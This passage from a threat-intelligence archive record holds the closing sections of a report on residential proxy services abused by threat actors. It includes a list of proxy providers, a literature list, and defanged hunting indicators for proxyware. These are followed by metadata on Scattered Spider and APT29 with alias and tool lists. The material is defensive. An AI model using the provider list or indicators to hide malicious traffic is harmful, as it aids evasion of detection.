\r\nOn the other hand, such activities are difficult to cluster and disrupt. While law enforcement agencies have\r\ntaken various actions aimed at disrupting RESIP services over time, these efforts remained isolated cases.\r\nExamples include the dismantlement of the RSOCKS proxy service and, more recently, the disruption of the IPStorm\r\nbotnet, which likely had a limited, short-term effect, as the market remains highly competitive. \r\nMoreover, if such actions aren't followed by any repressive effort, providers can easily revive their infrastructure.\r\nRESIP services leveraged by cybercriminal actors are typically relatively unstructured elements of a well-established cybercrime chain, meaning that dismantling them alone does little to combat criminal activities\r\noverall.\r\nFrom our observations, RESIP providers openly promote their offerings and advertise key features on well-established forums, and usually redirect customers to dedicated websites hosted on the Clear Web for purchase.\r\nWe are not able to ascertain whether the operators are exclusively focusing on RESIP-related activities or are well-established cybercrime-related actors also operating in other areas.\r\nOur analysis suggests a notable proliferation of greyhat RESIP services, particularly among advanced intrusion\r\nsets. In contrast to the reliance of less advanced actors on commercial VPNs, which are easier to detect, the\r\nincreasing RESIP adoption makes it difficult to differentiate connections from legitimate sources and those\r\noriginating from malicious actors. 
Consequently, detection and attribution are increasingly challenging.\r\nOur assumption is that RESIP services will be increasingly exploited by malicious actors in the next few years.\r\nWhile such services are documented as being most used by advanced groups, it is highly likely that they will\r\nshortly be adopted by a wider threat ecosystem.\r\nAbout Orange Cyberdefense World Watch team\r\nThe World Watch service works on behalf of our customers to collect, analyse, prioritise, contextualise and summarise\r\nthe essential threat and vulnerability data customers need to make informed decisions. The team, composed of\r\nsenior CTI analysts, takes in a continuous stream of data from a variety of open, commercial and proprietary data\r\nsources. The streams are manually triaged and distributed to provide the essential threat and vulnerability\r\nintelligence our customers need to make good decisions, whilst filtering out fear, uncertainty and doubt (FUD) and\r\nother hyperbole that can distract and disorient security operations teams.\r\nAbout Sekoia.io TDR team\r\nTDR is the Sekoia Threat Detection \u0026 Research team. Created in 2020, TDR provides exclusive Threat\r\nIntelligence, including fresh and contextualised IOCs and threat reports for the Sekoia SOC Platform. TDR is\r\nalso responsible for producing detection materials through a built-in Sigma, Sigma Correlation and Anomaly rules\r\ncatalogue.\r\nTDR is a team of multidisciplinary and passionate cybersecurity experts, including security researchers, detection\r\nengineers, reverse engineers, and technical and strategic threat intelligence analysts.\r\nThreat Intelligence analysts and researchers are looking at state-sponsored \u0026 cybercrime threats from a strategic\r\nto a technical perspective to track, hunt and detect adversaries. 
Detection engineers focus on creating and\r\nmaintaining high-quality detection rules to detect the TTPs most widely exploited by adversaries.\r\nYou can also find this blogpost on Sekoia.io's website: https://blog.sekoia.io/unveiling-the-depths-of-residential-proxies-providers/\r\nAppendixes\r\nAppendix A: Sample of RESIP providers analysed\r\n922 Proxy\r\n9Proxy\r\nABC Proxy\r\nAceProxies\r\nAsocks\r\nBlackStore\r\nCloudRouter\r\nDCPROXY\r\nDigiproxy.cc\r\nGokturkhost\r\nGSproxy\r\nHomeIP\r\nIntenseProxy\r\nIPCola\r\nLeastslow\r\nLightning Proxies\r\nLIL Proxy\r\nLocalProxies\r\nLopata Proxy\r\nLTE Boost\r\nLumiProxy\r\nLunaProxy\r\nMangoProxy\r\nMountProxies\r\nNightProxy\r\nOkayVPN\r\nOmega Proxy\r\nPIA S5 Proxy\r\nPingProxies\r\nPROXIES.FO\r\nProxiware\r\nProxy Sale\r\nPROXY SOXY\r\nProxyHub\r\nProxyWave Shop\r\nProxyWRLD\r\nPythaProxy\r\nRAINPROXY LLC\r\nResidentialProxy.Online\r\nShifter\r\nSmart Proxy\r\nSOCKS CAT\r\nSpyder Proxy\r\nStorm Proxies\r\nThunderProxy\r\nTrackProxies\r\nUniProxy\r\nVALORANT / LoL\r\nWe1.Town\r\nyilu.us\r\nAppendix B: Literature on suspicious RESIP (non-exhaustive)\r\nCloudRouter / 911\r\nCloudRouter: 911 Proxy Resurrected (Spur, February 2024)\r\nUnnamed proxy service\r\nMidnight Blizzard: Guidance for responders on nation-state attack (Microsoft, January 2024)\r\nRayobyte / FineProxy\r\nMajor Proxy Providers Implicated in digital attack on Philippine Media Giant Rappler (Qurium, December 2023)\r\nBoostyProxy\r\nUnveiling Socks5Systemz: The Rise of a New Proxy Service via PrivateLoader and Amadey (BitSight, November\r\n2023)\r\nWhiteProxies\r\nDDoS attacks against Hungarian media traced to proxy infrastructure “WhiteProxies” (Qurium, November 2023)\r\nProxx.io/net\r\nRussian and Moldovan National Pleads Guilty to Operating Illegal Botnet Proxy Service that Infected Tens of\r\nThousands of Internet-Connected Devices Around the World (United States Department of Justice, November\r\n2023)\r\nDoveIP / Bullet proxy\r\nTrojans All the Way Down: BADBOX and PEACHPIT (HUMAN Security, October 2023)\r\nA Closer Exploration of Residential Proxies and CAPTCHA-Breaking Services (Trend Micro, July 2023)\r\nNimbleway\r\nBrianKrebs on infosec.exchange (Brian Krebs, August 2023)\r\nProxyNation/DigitalPulseData\r\nProxyNation: The dark nexus between proxy apps and malware (AT\u0026T Alien Labs, August 2023)\r\nSocksEscort\r\nChristmas in July: A Finely Wrapped Malware Proxy Service (Spur, July 2023)\r\nUnnamed proxy service\r\nRouters From The Underground: Exposing AVrecon (Lumen, July 2023)\r\nNexusnet / 
EliteProxy.net / Proxysell.com / asocks.com\r\nIntegral Ad Science Uncovered A Malicious VPN App With Over One Million Downloads (B\u0026T, May 2023)\r\nTECHNICAL DISCLOSURE: OKO VPN (IAS Threat Lab, May 2023)\r\nIdentifying the Nexus of Scaled Ad Fraud (Spur, May 2023)\r\nBHproxies\r\nMylobot: Investigating a proxy botnet (BitSight, February 2023)\r\nUnnamed proxy service\r\nOwner of an Android TV box? May want to check if it's an active botnet member... (DesktopECHO, November\r\n2022)\r\nMicroleaves/Shifter.io\r\nBreach Exposes Users of Microleaves Proxy Service (KrebsOnSecurity, July 2022)\r\n911.re / VIP72 / LuxSocks\r\n911 Proxy Service Implodes After Disclosing Breach (KrebsOnSecurity, July 2022)\r\nRSOCKS\r\nMeet the Administrators of the RSOCKS Proxy Botnet (KrebsOnSecurity, June 2022)\r\nAWM proxy (proxs.ru)\r\nThe Link Between AWM Proxy \u0026 the Glupteba Botnet (KrebsOnSecurity, June 2022)\r\nUnnamed proxy service\r\nAnatomy of an Android Malware Dropper (EFF Threat Lab, April 2022)\r\nHoneyGain/Peer2Profit\r\nAttracting flies with Honey(gain): Adversarial abuse of proxyware (Talos, August 2021)\r\nVIP72\r\n15-Year-Old Malware Proxy Network VIP72 Goes Dark (KrebsOnSecurity, July 2021)\r\nFree-socks.in\r\nAn Analysis of Linux.Ngioweb Botnet (NetLab, June 2019)\r\nAppendix C: Hunting leads (non-exhaustive)\r\nProxywares are not inherently malicious and generally do not pose an immediate security risk to the devices on\r\nwhich they are installed. However, their presence on corporate devices is likely to violate the IT policies of most\r\norganisations. 
The indicators listed below, which are associated with some of the most well-known proxywares,\r\ndo not constitute an exhaustive list but provide a starting point for assessing the prevalence of this type of software\r\nwithin a network.\r\nBright SDK\r\nThe Bright Data (formerly Luminati) SDK allows developers to incorporate proxyware functionality into their\r\napplications. Upon installation, users are given the choice to opt in to premium features in exchange for the use of\r\ntheir internet connection. Developers receive compensation proportional to the amount of the user's internet\r\nconnection utilised.\r\nEarnApp\r\nEarnApp is a proxyware affiliated with Bright Data that lets users earn money in exchange for the use of their\r\ninternet connection.\r\n34.237.199[.]147 IP address\r\nclient.earnapp[.]com domain name\r\nearnapp.exe file name\r\nearnapp file name\r\nHola VPN\r\nHola is a free VPN product affiliated with Bright Data which allows free access in return for utilising users'\r\ninternet connection. It is most commonly installed as a web browser extension.\r\nInfatica SDK\r\nInfatica SDK allows developers to incorporate proxyware functionality into their applications, and to receive\r\ncompensation when the user's internet connection is utilised.\r\n185.223.94[.]16:8886 IP address\r\n103.chtsite[.]com domain name\r\ninfatica-service-app[.]exe file name\r\ninfatica-service.dll file name\r\nHoneygain\r\nHoneygain is a proxyware affiliated with Oxylabs that lets users earn money in exchange for the use of their\r\ninternet connection.\r\napi.honeygain[.]com domain name\r\nHoneygain.exe file name\r\nHoneygainUpdater.exe file name\r\nhoneygain file name\r\nPeer2Profit\r\nPeer2Profit is a proxyware that lets users earn money in exchange for the use of their internet connection.\r\n178.32.99[.]172 IP address\r\napi.peer2profit[.]global domain name\r\nupdates.peer2profit[.]app domain name\r\nPeer2Profit.exe file name\r\npeer2profit file name\r\nIPRoyal and Pawns.app\r\nPawns.app is a proxyware affiliated with IPRoyal that lets users earn money in exchange for the use of their\r\ninternet connection.\r\nSource: https://www.orangecyberdefense.com/global/blog/research/residential-proxies",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.orangecyberdefense.com/global/blog/research/residential-proxies"
	],
	"report_names": [
		"residential-proxies"
	],
	"threat_actors": [
		{
			"id": "9ddc7baf-2ea7-4294-af2c-5fce1021e8e8",
			"created_at": "2023-06-23T02:04:34.386651Z",
			"updated_at": "2026-04-10T02:00:04.772256Z",
			"deleted_at": null,
			"main_name": "Muddled Libra",
			"aliases": [
				"0ktapus",
				"Scatter Swine",
				"Scattered Spider"
			],
			"source_name": "ETDA:Muddled Libra",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c",
			"created_at": "2023-11-01T02:01:06.643737Z",
			"updated_at": "2026-04-10T02:00:05.340198Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"Scattered Spider",
				"Roasted 0ktapus",
				"Octo Tempest",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "MITRE:Scattered Spider",
			"tools": [
				"WarzoneRAT",
				"Rclone",
				"LaZagne",
				"Mimikatz",
				"Raccoon Stealer",
				"ngrok",
				"BlackCat",
				"ConnectWise"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0",
			"created_at": "2023-10-03T02:00:08.510742Z",
			"updated_at": "2026-04-10T02:00:03.374705Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"UNC3944",
				"Scattered Swine",
				"Octo Tempest",
				"DEV-0971",
				"Starfraud",
				"Muddled Libra",
				"Oktapus",
				"Scatter Swine",
				"0ktapus",
				"Storm-0971"
			],
			"source_name": "MISPGALAXY:Scattered Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9",
			"created_at": "2023-10-14T02:03:13.99057Z",
			"updated_at": "2026-04-10T02:00:04.531987Z",
			"deleted_at": null,
			"main_name": "Scattered Spider",
			"aliases": [
				"0ktapus",
				"LUCR-3",
				"Muddled Libra",
				"Octo Tempest",
				"Scatter Swine",
				"Scattered Spider",
				"Star Fraud",
				"Storm-0875",
				"UNC3944"
			],
			"source_name": "ETDA:Scattered Spider",
			"tools": [
				"ADRecon",
				"AnyDesk",
				"ConnectWise",
				"DCSync",
				"FiveTran",
				"FleetDeck",
				"Govmomi",
				"Hekatomb",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"Lumma Stealer",
				"LummaC2",
				"Mimikatz",
				"Ngrok",
				"PingCastle",
				"ProcDump",
				"PsExec",
				"Pulseway",
				"Pure Storage FlashArray",
				"Pure Storage FlashArray PowerShell SDK",
				"RedLine Stealer",
				"Rsocx",
				"RustDesk",
				"ScreenConnect",
				"SharpHound",
				"Socat",
				"Spidey Bot",
				"Splashtop",
				"Stealc",
				"TacticalRMM",
				"Tailscale",
				"TightVNC",
				"VIDAR",
				"Vidar Stealer",
				"WinRAR",
				"WsTunnel",
				"gosecretsdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824",
			"created_at": "2024-06-19T02:03:08.062614Z",
			"updated_at": "2026-04-10T02:00:03.655475Z",
			"deleted_at": null,
			"main_name": "GOLD HARVEST",
			"aliases": [
				"Octo Tempest ",
				"Roasted 0ktapus ",
				"Scatter Swine ",
				"Scattered Spider ",
				"UNC3944 "
			],
			"source_name": "Secureworks:GOLD HARVEST",
			"tools": [
				"AnyDesk",
				"ConnectWise Control",
				"Logmein"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434443,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe.pdf",
		"text": "https://archive.orkl.eu/c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe.txt",
		"img": "https://archive.orkl.eu/c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe.jpg"
	}
}